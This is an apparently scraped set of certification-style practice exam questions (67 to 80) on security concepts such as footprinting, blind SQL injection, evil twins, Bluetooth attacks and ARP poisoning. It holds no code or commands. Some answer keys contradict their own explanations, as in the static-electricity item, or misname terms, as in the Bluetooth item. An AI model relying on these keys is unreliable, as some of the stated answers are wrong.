RC4 and AES are encryption algorithms (AES is used in WPA, by the way). 802.1x is the standards family wireless comes from.
Question 67 of 80
67. Question
A pen test member verifies the entire IP address range owned by the target, discovers details of their domain name registration, and visits job boards and financial websites regarding the target. What activity is being performed?
Correct
Correct Answer:
Passive footprinting is correct.
Passive footprinting is all about things that are publicly available and don’t expose you to great risk of discovery.
Incorrect Answers:
Vulnerability assessment, Active footprinting, and Security assessment are incorrect.
A vulnerability assessment touches each system looking for open vulnerabilities that can be exploited.
Active footprinting puts you at greater risk of discovery (network sniffing and social engineering, for example).
Security assessment is a term associated with an overall penetration test.
Incorrect
Correct Answer:
Passive footprinting is correct.
Passive footprinting is all about things that are publicly available and don’t expose you to great risk of discovery.
Incorrect Answers:
Vulnerability assessment, Active footprinting, and Security assessment are incorrect.
A vulnerability assessment touches each system looking for open vulnerabilities that can be exploited.
Active footprinting puts you at greater risk of discovery (network sniffing and social engineering, for example).
Security assessment is a term associated with an overall penetration test.
Unattempted
Correct Answer:
Passive footprinting is correct.
Passive footprinting is all about things that are publicly available and don’t expose you to great risk of discovery.
Incorrect Answers:
Vulnerability assessment, Active footprinting, and Security assessment are incorrect.
A vulnerability assessment touches each system looking for open vulnerabilities that can be exploited.
Active footprinting puts you at greater risk of discovery (network sniffing and social engineering, for example).
Security assessment is a term associated with an overall penetration test.
Question 68 of 80
68. Question
You are concerned about static electricity problems in your data center. Which of the following will not assist you in dealing with the problem?
Correct
Correct answer:
Wrist straps is correct.
Positive pressure is great at keeping contaminants—dust, dirt, and so on—out of the data center, but it doesn’t do a thing regarding static electricity.
Incorrect answers:
Antistatic wrist straps are designed to ground you appropriately, providing somewhere for any latent static electricity you’ve generated to flow.
Same with proper grounding systems for everything else. More humidity equals less static electricity, so a humidity system is an absolute requirement.
Incorrect
Correct answer:
Wrist straps is correct.
Positive pressure is great at keeping contaminants—dust, dirt, and so on—out of the data center, but it doesn’t do a thing regarding static electricity.
Incorrect answers:
Antistatic wrist straps are designed to ground you appropriately, providing somewhere for any latent static electricity you’ve generated to flow.
Same with proper grounding systems for everything else. More humidity equals less static electricity, so a humidity system is an absolute requirement.
Unattempted
Correct answer:
Wrist straps is correct.
Positive pressure is great at keeping contaminants—dust, dirt, and so on—out of the data center, but it doesn’t do a thing regarding static electricity.
Incorrect answers:
Antistatic wrist straps are designed to ground you appropriately, providing somewhere for any latent static electricity you’ve generated to flow.
Same with proper grounding systems for everything else. More humidity equals less static electricity, so a humidity system is an absolute requirement.
Question 69 of 80
69. Question
Which of the following laws protects the confidentiality and integrity of personal information collected by financial institutions?
Correct
Correct Answer:
GLBA is correct.
The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to take steps to protect customer information. It also forces them to provide their privacy practices to the public.
Incorrect Answers:
HIPAA deals with the protection of personal data in the medical realm.
SOX deals with publicly traded companies, forcing them to allow independent audits and to post financial findings.
PCI DSS is in place to secure data used in credit card transactions and storage.
Incorrect
Correct Answer:
GLBA is correct.
The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to take steps to protect customer information. It also forces them to provide their privacy practices to the public.
Incorrect Answers:
HIPAA deals with the protection of personal data in the medical realm.
SOX deals with publicly traded companies, forcing them to allow independent audits and to post financial findings.
PCI DSS is in place to secure data used in credit card transactions and storage.
Unattempted
Correct Answer:
GLBA is correct.
The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to take steps to protect customer information. It also forces them to provide their privacy practices to the public.
Incorrect Answers:
HIPAA deals with the protection of personal data in the medical realm.
SOX deals with publicly traded companies, forcing them to allow independent audits and to post financial findings.
PCI DSS is in place to secure data used in credit card transactions and storage.
Question 70 of 80
70. Question
Which Bluetooth attack is used in an attempt to steal data from the device?
Correct
Correct Answer:
Bluesniffing is correct.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Incorrect Answers:
Bluesmacking is a DoS attack.
Bluescarfing is the actual theft of data from a Bluetooth device.
Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Incorrect
Correct Answer:
Bluesniffing is correct.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Incorrect Answers:
Bluesmacking is a DoS attack.
Bluescarfing is the actual theft of data from a Bluetooth device.
Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Unattempted
Correct Answer:
Bluesniffing is correct.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Incorrect Answers:
Bluesmacking is a DoS attack.
Bluescarfing is the actual theft of data from a Bluetooth device.
Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Question 71 of 80
71. Question
A pen tester is attempting to inject SQL queries based solely on responses to true/false questions. Which of the following best describes the action he is taking?
Correct
Correct Answer:
Blind SQL injection is correct.
Blind (also known as inferential) injection occurs when the attacker knows the database is susceptible to injection, but the error messages and screen returns don’t come back to the attacker. In other words, if the administrator is smart enough to ensure only generic responses come back from queries, an attacker can still ask the database true-or-false questions and determine the answer based on the application’s response. Because there’s a lot of guesswork and trial and error, this attack takes a long while to pull off.
Incorrect Answers:
Hunt SQL, Compound SQL, and SQLi guess are incorrect.
These injection types do not exist.
Incorrect
Correct Answer:
Blind SQL injection is correct.
Blind (also known as inferential) injection occurs when the attacker knows the database is susceptible to injection, but the error messages and screen returns don’t come back to the attacker. In other words, if the administrator is smart enough to ensure only generic responses come back from queries, an attacker can still ask the database true-or-false questions and determine the answer based on the application’s response. Because there’s a lot of guesswork and trial and error, this attack takes a long while to pull off.
Incorrect Answers:
Hunt SQL, Compound SQL, and SQLi guess are incorrect.
These injection types do not exist.
Unattempted
Correct Answer:
Blind SQL injection is correct.
Blind (also known as inferential) injection occurs when the attacker knows the database is susceptible to injection, but the error messages and screen returns don’t come back to the attacker. In other words, if the administrator is smart enough to ensure only generic responses come back from queries, an attacker can still ask the database true-or-false questions and determine the answer based on the application’s response. Because there’s a lot of guesswork and trial and error, this attack takes a long while to pull off.
Incorrect Answers:
Hunt SQL, Compound SQL, and SQLi guess are incorrect.
These injection types do not exist.
Question 72 of 80
72. Question
An attacker performs reconnaissance and learns the organization’s SSID. He places an access point inside a closet to trick normal users into connecting to it, and then he begins redirecting them to malicious sites. Which of the following categorizes this attack?
Correct
Correct Answer:
Evil twin attack is correct.
A rogue access point is also known as an evil twin. Usually, evil twins are discovered quickly; however, there are lots of organizations that don’t regularly scan for them.
Incorrect Answers:
A replay attack occurs when communications (usually authentication related) are recorded and replayed by the attacker.
Closet AP and WEP nap aren’t legitimate terms.
Incorrect
Correct Answer:
Evil twin attack is correct.
A rogue access point is also known as an evil twin. Usually, evil twins are discovered quickly; however, there are lots of organizations that don’t regularly scan for them.
Incorrect Answers:
A replay attack occurs when communications (usually authentication related) are recorded and replayed by the attacker.
Closet AP and WEP nap aren’t legitimate terms.
Unattempted
Correct Answer:
Evil twin attack is correct.
A rogue access point is also known as an evil twin. Usually, evil twins are discovered quickly; however, there are lots of organizations that don’t regularly scan for them.
Incorrect Answers:
A replay attack occurs when communications (usually authentication related) are recorded and replayed by the attacker.
Closet AP and WEP nap aren’t legitimate terms.
Question 73 of 80
73. Question
In a known-plain-text attack, what does the attacker have access to?
Correct
Correct Answer:
Both plain text and cipher text is correct.
In a known-plain-text attack, the attacker has both versions and compares plain-text entries against their cipher-text counterparts to find patterns that can be used to break other cipher texts.
Incorrect Answers:
The plain text only, The cipher text only, and None of the above are incorrect.
These answers do not reflect known-plain-text attacks.
Incorrect
Correct Answer:
Both plain text and cipher text is correct.
In a known-plain-text attack, the attacker has both versions and compares plain-text entries against their cipher-text counterparts to find patterns that can be used to break other cipher texts.
Incorrect Answers:
The plain text only, The cipher text only, and None of the above are incorrect.
These answers do not reflect known-plain-text attacks.
Unattempted
Correct Answer:
Both plain text and cipher text is correct.
In a known-plain-text attack, the attacker has both versions and compares plain-text entries against their cipher-text counterparts to find patterns that can be used to break other cipher texts.
Incorrect Answers:
The plain text only, The cipher text only, and None of the above are incorrect.
These answers do not reflect known-plain-text attacks.
Question 74 of 80
74. Question
Which of the following best describes the role that the U.S. Computer Security Incident Response Team (CSIRT) provides?
Correct
Correct answer:
A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security is correct. CSIRT provides incident response services for any user, company, agency, or organization in partnership with the Department of Homeland Security.
Incorrect answers:
Vulnerability measurement and assessments for the U.S. Department of Defense, Incident response services for all Internet providers, and Pen test registration for public and private sector are incorrect.
These answers do not reflect CSIRT.
Incorrect
Correct answer:
A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security is correct. CSIRT provides incident response services for any user, company, agency, or organization in partnership with the Department of Homeland Security.
Incorrect answers:
Vulnerability measurement and assessments for the U.S. Department of Defense, Incident response services for all Internet providers, and Pen test registration for public and private sector are incorrect.
These answers do not reflect CSIRT.
Unattempted
Correct answer:
A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security is correct. CSIRT provides incident response services for any user, company, agency, or organization in partnership with the Department of Homeland Security.
Incorrect answers:
Vulnerability measurement and assessments for the U.S. Department of Defense, Incident response services for all Internet providers, and Pen test registration for public and private sector are incorrect.
These answers do not reflect CSIRT.
Question 75 of 80
75. Question
You are performing penetration testing with your team and successfully gain access to a machine. You discover a hidden folder on the system that has an individual’s bank account password and user ID stored in plain text. Which of the following should you do?
Correct
Correct answer:
Continue testing is correct.
CEH and real-life circumstance often don’t line up. Your agreement documentation should be iron clad and cover what your actions should be in any given event. Outside of any specific direction provided, in this circumstance you should just continue testing. Your team does not know what is on these systems or why it is stored there, and any other action may put you in legal trouble. Document, and move on.
Incorrect answers:
Report the finding to the systems administrator immediately, Store the file elsewhere and delete it from the machine, and Use the credentials to log in to the bank account and leverage attacks into that system are incorrect.
Unless specifically directed, discovery of any particular finding is not cause to stop and report findings immediately.
The remaining answers are unethical.
Incorrect
Correct answer:
Continue testing is correct.
CEH and real-life circumstance often don’t line up. Your agreement documentation should be iron clad and cover what your actions should be in any given event. Outside of any specific direction provided, in this circumstance you should just continue testing. Your team does not know what is on these systems or why it is stored there, and any other action may put you in legal trouble. Document, and move on.
Incorrect answers:
Report the finding to the systems administrator immediately, Store the file elsewhere and delete it from the machine, and Use the credentials to log in to the bank account and leverage attacks into that system are incorrect.
Unless specifically directed, discovery of any particular finding is not cause to stop and report findings immediately.
The remaining answers are unethical.
Unattempted
Correct answer:
Continue testing is correct.
CEH and real-life circumstance often don’t line up. Your agreement documentation should be iron clad and cover what your actions should be in any given event. Outside of any specific direction provided, in this circumstance you should just continue testing. Your team does not know what is on these systems or why it is stored there, and any other action may put you in legal trouble. Document, and move on.
Incorrect answers:
Report the finding to the systems administrator immediately, Store the file elsewhere and delete it from the machine, and Use the credentials to log in to the bank account and leverage attacks into that system are incorrect.
Unless specifically directed, discovery of any particular finding is not cause to stop and report findings immediately.
The remaining answers are unethical.
Question 76 of 80
76. Question
Which of the following is true regarding ESP in Tunnel Mode?
Correct
Correct Answer:
It encrypts the entire packet is correct. If you think about tunneling across the Internet, this makes perfect sense—of course the entire packet is encrypted.
Incorrect Answers:
It encrypts only the payload, It encrypts the header only, and It provides authentication and integrity for the entire packet are incorrect.
Tunnel Mode encrypts the entire packet, so answers It encrypts only the payload and It encrypts the header only are out.
As far as authentication and integrity go, that is provided by AH but usually only in Transport Mode.
Incorrect
Correct Answer:
It encrypts the entire packet is correct. If you think about tunneling across the Internet, this makes perfect sense—of course the entire packet is encrypted.
Incorrect Answers:
It encrypts only the payload, It encrypts the header only, and It provides authentication and integrity for the entire packet are incorrect.
Tunnel Mode encrypts the entire packet, so answers It encrypts only the payload and It encrypts the header only are out.
As far as authentication and integrity go, that is provided by AH but usually only in Transport Mode.
Unattempted
Correct Answer:
It encrypts the entire packet is correct. If you think about tunneling across the Internet, this makes perfect sense—of course the entire packet is encrypted.
Incorrect Answers:
It encrypts only the payload, It encrypts the header only, and It provides authentication and integrity for the entire packet are incorrect.
Tunnel Mode encrypts the entire packet, so answers It encrypts only the payload and It encrypts the header only are out.
As far as authentication and integrity go, that is provided by AH but usually only in Transport Mode.
Question 77 of 80
77. Question
Malware developers do their best to hide their work. Which of the following best describes crypters?
Correct
Correct answer:
Software tools that use a combination of encryption and code manipulation to render malware as undetectable to antivirus products is correct.
Crypters are software tools that use a combination of encryption and code manipulation to render malware as undetectable to AV and other security-monitoring products (in Internet lingo, it’s referred to as “fud,” for “fully undetectable”).
Incorrect answers:
“Packers” are a variant of crypters and use compression to pack the malware executable into a smaller size.
Trojans look innocent but turn evil after installation.
Steganography tools hide data in existing image, video, or audio files.
Incorrect
Correct answer:
Software tools that use a combination of encryption and code manipulation to render malware as undetectable to antivirus products is correct.
Crypters are software tools that use a combination of encryption and code manipulation to render malware as undetectable to AV and other security-monitoring products (in Internet lingo, it’s referred to as “fud,” for “fully undetectable”).
Incorrect answers:
“Packers” are a variant of crypters and use compression to pack the malware executable into a smaller size.
Trojans look innocent but turn evil after installation.
Steganography tools hide data in existing image, video, or audio files.
Unattempted
Correct answer:
Software tools that use a combination of encryption and code manipulation to render malware as undetectable to antivirus products is correct.
Crypters are software tools that use a combination of encryption and code manipulation to render malware as undetectable to AV and other security-monitoring products (in Internet lingo, it’s referred to as “fud,” for “fully undetectable”).
Incorrect answers:
“Packers” are a variant of crypters and use compression to pack the malware executable into a smaller size.
Trojans look innocent but turn evil after installation.
Steganography tools hide data in existing image, video, or audio files.
Question 78 of 80
78. Question
In WEP, data integrity is provided by a 32-bit integrity check value (ICV) that is appended to the 802.11 payload and encrypted. However, this could be changed by an attacker without being detected by the recipient. What does WPA use as an improved integrity measure?
Correct
Correct Answer:
MIC is correct.
Message integrity check (MIC, also known as Michael) is a feature of WPA that provides for integrity checking and, therefore, helps protect against man-in-the-middle attacks. MIC calculates an 8-byte field and places it between the data portion of the frame and the 4-byte ICV (integrity check value). It also includes a sequence number to wireless packets, and if the WAP receives packets out of order, it will drop them.
Incorrect Answers:
AES and RC4 are encryption algorithms.
CCMP does provide for integrity checking, but it’s part of WPA2, not WPA.
Incorrect
Correct Answer:
MIC is correct.
Message integrity check (MIC, also known as Michael) is a feature of WPA that provides for integrity checking and, therefore, helps protect against man-in-the-middle attacks. MIC calculates an 8-byte field and places it between the data portion of the frame and the 4-byte ICV (integrity check value). It also includes a sequence number to wireless packets, and if the WAP receives packets out of order, it will drop them.
Incorrect Answers:
AES and RC4 are encryption algorithms.
CCMP does provide for integrity checking, but it’s part of WPA2, not WPA.
Unattempted
Correct Answer:
MIC is correct.
Message integrity check (MIC, also known as Michael) is a feature of WPA that provides for integrity checking and, therefore, helps protect against man-in-the-middle attacks. MIC calculates an 8-byte field and places it between the data portion of the frame and the 4-byte ICV (integrity check value). It also includes a sequence number to wireless packets, and if the WAP receives packets out of order, it will drop them.
Incorrect Answers:
AES and RC4 are encryption algorithms.
CCMP does provide for integrity checking, but it’s part of WPA2, not WPA.
Question 79 of 80
79. Question
Which cloud service type is designed to offer on-demand applications to subscribers over the Internet?
Correct
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Incorrect
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Unattempted
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 80 of 80
80. Question
Which of the following best describes ARP poisoning?
Correct
Correct Answer:
In ARP poisoning, an attacker continually inserts invalid entries into an ARP cache is correct.
In ARP poisoning, the bad guy keeps injecting a bad IP-to-MAC mapping in order to have traffic intended for the target go somewhere else.
Incorrect answers:
In ARP poisoning, an attacker floods a switch with thousands of ARP packets, In ARP poisoning, an attacker uses ARP to insert bad IP mappings into a DNS server, and In ARP poisoning, an attacker continually deletes an ARP cache are incorrect.
None of the remaining answers correctly describes ARP poisoning. Yes, it’s true an attacker may be sending thousands of ARP packets through a switch to the target, but that in and of itself does not ARP poisoning make.
Incorrect
Correct Answer:
In ARP poisoning, an attacker continually inserts invalid entries into an ARP cache is correct.
In ARP poisoning, the bad guy keeps injecting a bad IP-to-MAC mapping in order to have traffic intended for the target go somewhere else.
Incorrect answers:
In ARP poisoning, an attacker floods a switch with thousands of ARP packets, In ARP poisoning, an attacker uses ARP to insert bad IP mappings into a DNS server, and In ARP poisoning, an attacker continually deletes an ARP cache are incorrect.
None of the remaining answers correctly describes ARP poisoning. Yes, it’s true an attacker may be sending thousands of ARP packets through a switch to the target, but that in and of itself does not ARP poisoning make.
Unattempted
Correct Answer:
In ARP poisoning, an attacker continually inserts invalid entries into an ARP cache is correct.
In ARP poisoning, the bad guy keeps injecting a bad IP-to-MAC mapping in order to have traffic intended for the target go somewhere else.
Incorrect answers:
In ARP poisoning, an attacker floods a switch with thousands of ARP packets, In ARP poisoning, an attacker uses ARP to insert bad IP mappings into a DNS server, and In ARP poisoning, an attacker continually deletes an ARP cache are incorrect.
None of the remaining answers correctly describes ARP poisoning. Yes, it’s true an attacker may be sending thousands of ARP packets through a switch to the target, but that in and of itself does not ARP poisoning make.
X
Use Page numbers below to navigate to other practice tests